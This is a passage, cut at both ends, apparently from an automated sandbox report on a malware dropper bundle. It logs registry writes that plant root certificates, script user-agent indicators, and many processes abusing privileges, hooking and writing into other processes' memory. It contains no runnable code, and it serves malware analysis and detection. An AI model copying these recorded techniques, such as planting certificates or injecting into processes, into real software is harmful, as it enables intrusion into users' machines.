7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 Weather Installation.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Cleaner Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0400000001000000100000001bfe69d191b71933a372a80fe155e5b50f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e5c0000000100000004000000001000002000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Cleaner Installation.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B Weather Installation.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 120 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 125 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
WerFault.exemsedge.exemsedge.exeWerFault.exeidentity_helper.exeInstallation.exebEYG8MCmwS_N0mgL9uYFs3Jb.exeWerFault.exeWerFault.exeWerFault.exepid process 1832 WerFault.exe 1832 WerFault.exe 2460 msedge.exe 2460 msedge.exe 5040 msedge.exe 5040 msedge.exe 1492 WerFault.exe 1492 WerFault.exe 4608 identity_helper.exe 4608 identity_helper.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 3980 Installation.exe 6108 bEYG8MCmwS_N0mgL9uYFs3Jb.exe 6108 bEYG8MCmwS_N0mgL9uYFs3Jb.exe 6092 WerFault.exe 6092 WerFault.exe 508 WerFault.exe 508 WerFault.exe 3192 3192 5272 WerFault.exe 5272 WerFault.exe 3192 3192 3192 3192 3192 3192 3192 3192 3192 3192 3192 3192 3192 3192 3192 3192 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3192 -
Suspicious behavior: MapViewOfSection 64 IoCs
Processes:
bEYG8MCmwS_N0mgL9uYFs3Jb.exeexplorer.exepid process 6108 bEYG8MCmwS_N0mgL9uYFs3Jb.exe 3192 3192 3192 3192 3192 3192 3192 3192 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3192 3192 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3192 3192 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3192 3192 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3192 3192 3280 explorer.exe 3280 explorer.exe 3192 3192 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
KRSetp.exeWerFault.exesvchost.exeOaUqDiJqLrReD6nAIAxVSWA8.exerUNdlL32.eXeAGV_ZCjRSXUJEYPKIJWOth72.exebAGRnF23dqqSQc9GLsP_8f2i.exeLvJ59gJxc3LSPWvaIC75WK3C.exe8421129.exei51OEtivp64F1h3jriSb9179.exe3544711.exeaskinstall53.exedescription pid process Token: SeDebugPrivilege 4780 KRSetp.exe Token: SeRestorePrivilege 1832 WerFault.exe Token: SeBackupPrivilege 1832 WerFault.exe Token: SeBackupPrivilege 1832 WerFault.exe Token: SeTcbPrivilege 2476 svchost.exe Token: SeTcbPrivilege 2476 svchost.exe Token: SeTcbPrivilege 2476 svchost.exe Token: SeTcbPrivilege 2476 svchost.exe Token: SeTcbPrivilege 2476 svchost.exe Token: SeTcbPrivilege 2476 svchost.exe Token: SeDebugPrivilege 5236 OaUqDiJqLrReD6nAIAxVSWA8.exe Token: SeDebugPrivilege 5264 rUNdlL32.eXe Token: SeShutdownPrivilege 3192 Token: SeCreatePagefilePrivilege 3192 Token: SeShutdownPrivilege 3192 Token: SeCreatePagefilePrivilege 3192 Token: SeDebugPrivilege 2260 AGV_ZCjRSXUJEYPKIJWOth72.exe Token: SeShutdownPrivilege 3192 Token: SeCreatePagefilePrivilege 3192 Token: SeShutdownPrivilege 3192 Token: SeCreatePagefilePrivilege 3192 Token: SeShutdownPrivilege 3192 Token: SeCreatePagefilePrivilege 3192 Token: SeShutdownPrivilege 3192 Token: SeCreatePagefilePrivilege 3192 Token: SeShutdownPrivilege 3192 Token: SeCreatePagefilePrivilege 3192 Token: SeShutdownPrivilege 3192 Token: SeCreatePagefilePrivilege 3192 Token: SeShutdownPrivilege 3192 Token: SeCreatePagefilePrivilege 3192 Token: SeShutdownPrivilege 3192 Token: SeCreatePagefilePrivilege 3192 Token: SeShutdownPrivilege 3192 Token: SeCreatePagefilePrivilege 3192 Token: SeShutdownPrivilege 3192 Token: SeCreatePagefilePrivilege 3192 Token: SeShutdownPrivilege 3192 Token: SeCreatePagefilePrivilege 3192 Token: SeShutdownPrivilege 3192 Token: SeCreatePagefilePrivilege 3192 Token: SeDebugPrivilege 5364 bAGRnF23dqqSQc9GLsP_8f2i.exe Token: SeDebugPrivilege 5204 LvJ59gJxc3LSPWvaIC75WK3C.exe Token: SeDebugPrivilege 1400 8421129.exe Token: SeDebugPrivilege 4636 i51OEtivp64F1h3jriSb9179.exe Token: SeShutdownPrivilege 3192 Token: SeCreatePagefilePrivilege 3192 Token: SeShutdownPrivilege 3192 Token: SeCreatePagefilePrivilege 3192 Token: SeShutdownPrivilege 3192 Token: SeCreatePagefilePrivilege 3192 Token: SeDebugPrivilege 1588 3544711.exe Token: SeShutdownPrivilege 3192 Token: SeCreatePagefilePrivilege 3192 Token: SeShutdownPrivilege 3192 Token: SeCreatePagefilePrivilege 3192 Token: SeShutdownPrivilege 3192 Token: SeCreatePagefilePrivilege 3192 Token: SeCreateTokenPrivilege 1884 askinstall53.exe Token: SeAssignPrimaryTokenPrivilege 1884 askinstall53.exe Token: SeLockMemoryPrivilege 1884 askinstall53.exe Token: SeIncreaseQuotaPrivilege 1884 askinstall53.exe Token: SeMachineAccountPrivilege 1884 askinstall53.exe Token: SeTcbPrivilege 1884 askinstall53.exe -
Suspicious use of FindShellTrayWindow 15 IoCs
Processes:
msedge.exeX6pFteX1hujq71gAoddJIl03.tmpCleaner Installation.exeGameBoxWin64.exeWeather Installation.exeultramediaburner.tmpWerFault.exeWeather.exemsedge.exepid process 5040 msedge.exe 1284 X6pFteX1hujq71gAoddJIl03.tmp 5692 Cleaner Installation.exe 3472 GameBoxWin64.exe 2536 Weather Installation.exe 5744 ultramediaburner.tmp 3896 WerFault.exe 4032 Weather.exe 4032 Weather.exe 4032 Weather.exe 4032 Weather.exe 4032 Weather.exe 4032 Weather.exe 4032 Weather.exe 5488 msedge.exe -
Suspicious use of SendNotifyMessage 5 IoCs
Processes:
Weather.exepid process 4032 Weather.exe 4032 Weather.exe 4032 Weather.exe 4032 Weather.exe 4032 Weather.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
Installation.exe1JXoSiUoBQDRFxKQt6PfAJQT.exeS9vvbu_thmJNivbyrd5cbgjY.exe6fb0NKLzbR9O1Hnpb8meEjoY.exebEYG8MCmwS_N0mgL9uYFs3Jb.exeMsKeXpA3JCm5KJWAfbFTLe6p.exeiHcz2PjFZ8e9IDvRcRQLV9o9.exebFClUtu0XfsHUGnX6uO9BE2D.exeKaN6V1t36aPvGbjwrCNT4frv.exeZP8ROxtPgq7xzmkTnY1ILt2W.exeX6pFteX1hujq71gAoddJIl03.exe22222.exeX6pFteX1hujq71gAoddJIl03.tmpcustomer3.exemd8_8eus.exe1cu20YjSd19Ml5gGnIdtbCyZ.exe11111.exejfiag3g_gg.exe11111.exeultramediaburner.tmpSetup.exeMediaBurner2.exeaskinstall53.exeConhost.exeMediaBurner2.tmpmsedge.exe11111.exezhangfei.exezhangfei.exejfiag3g_gg.exe22222.exesvchost.exe22222.exeultramediaburner.exeufgaa.exeanyname.exeanyname.exe11111.exe804C.exe11111.exe11111.exeh5Mf7fCP0iLoTpkZt0_ezgBy.exe11111.exe11111.exe11111.exe11111.exe11111.exe11111.exe11111.exe11111.exejfiag3g_gg.exe11111.exe11111.exe11111.exe11111.exe11111.exe11111.exe11111.exe11111.exe11111.exepid process 3980 Installation.exe 5276 1JXoSiUoBQDRFxKQt6PfAJQT.exe 5288 S9vvbu_thmJNivbyrd5cbgjY.exe 5300 6fb0NKLzbR9O1Hnpb8meEjoY.exe 5316 bEYG8MCmwS_N0mgL9uYFs3Jb.exe 5328 MsKeXpA3JCm5KJWAfbFTLe6p.exe 5548 iHcz2PjFZ8e9IDvRcRQLV9o9.exe 5584 bFClUtu0XfsHUGnX6uO9BE2D.exe 5556 KaN6V1t36aPvGbjwrCNT4frv.exe 5340 ZP8ROxtPgq7xzmkTnY1ILt2W.exe 796 X6pFteX1hujq71gAoddJIl03.exe 5908 22222.exe 1284 X6pFteX1hujq71gAoddJIl03.tmp 1568 customer3.exe 5884 md8_8eus.exe 2708 1cu20YjSd19Ml5gGnIdtbCyZ.exe 3180 11111.exe 5824 jfiag3g_gg.exe 5248 11111.exe 5744 ultramediaburner.tmp 5908 22222.exe 5480 Setup.exe 3632 MediaBurner2.exe 1884 askinstall53.exe 1604 Conhost.exe 2240 MediaBurner2.tmp 5460 msedge.exe 6112 11111.exe 1664 zhangfei.exe 4856 zhangfei.exe 5780 jfiag3g_gg.exe 5908 22222.exe 2468 22222.exe 972 svchost.exe 2472 22222.exe 6776 ultramediaburner.exe 5744 ultramediaburner.tmp 5828 ufgaa.exe 876 anyname.exe 7084 anyname.exe 5628 11111.exe 4008 804C.exe 6508 11111.exe 5628 11111.exe 2076 11111.exe 5968 h5Mf7fCP0iLoTpkZt0_ezgBy.exe 6244 11111.exe 4628 11111.exe 5408 11111.exe 7104 11111.exe 2460 11111.exe 1376 11111.exe 4504 11111.exe 6332 11111.exe 7076 jfiag3g_gg.exe 1552 11111.exe 3500 11111.exe 3696 11111.exe 6216 11111.exe 5136 11111.exe 3240 11111.exe 6032 11111.exe 6088 11111.exe 5980 11111.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
EB7233922891E1DAD0434FBD52623647.exemsedge.exeFolder.exerUNdlL32.eXeWerFault.exedescription pid process target process PID 1624 wrote to memory of 4780 1624 EB7233922891E1DAD0434FBD52623647.exe KRSetp.exe PID 1624 wrote to memory of 4780 1624 EB7233922891E1DAD0434FBD52623647.exe KRSetp.exe PID 1624 wrote to memory of 5040 1624 EB7233922891E1DAD0434FBD52623647.exe msedge.exe PID 1624 wrote to memory of 5040 1624 EB7233922891E1DAD0434FBD52623647.exe msedge.exe PID 1624 wrote to memory of 4924 1624 EB7233922891E1DAD0434FBD52623647.exe Folder.exe PID 1624 wrote to memory of 4924 1624 EB7233922891E1DAD0434FBD52623647.exe Folder.exe PID 1624 wrote to memory of 4924 1624 EB7233922891E1DAD0434FBD52623647.exe Folder.exe PID 5040 wrote to memory of 3508 5040 msedge.exe msedge.exe PID 5040 wrote to memory of 3508 5040 msedge.exe msedge.exe PID 4924 wrote to memory of 4992 4924 Folder.exe Folder.exe PID 4924 wrote to memory of 4992 4924 Folder.exe Folder.exe PID 4924 wrote to memory of 4992 4924 Folder.exe Folder.exe PID 1624 wrote to memory of 4504 1624 EB7233922891E1DAD0434FBD52623647.exe Info.exe PID 1624 wrote to memory of 4504 1624 EB7233922891E1DAD0434FBD52623647.exe Info.exe PID 1624 wrote to memory of 4504 1624 EB7233922891E1DAD0434FBD52623647.exe Info.exe PID 1008 wrote to memory of 1096 1008 rUNdlL32.eXe rundll32.exe PID 1008 wrote to memory of 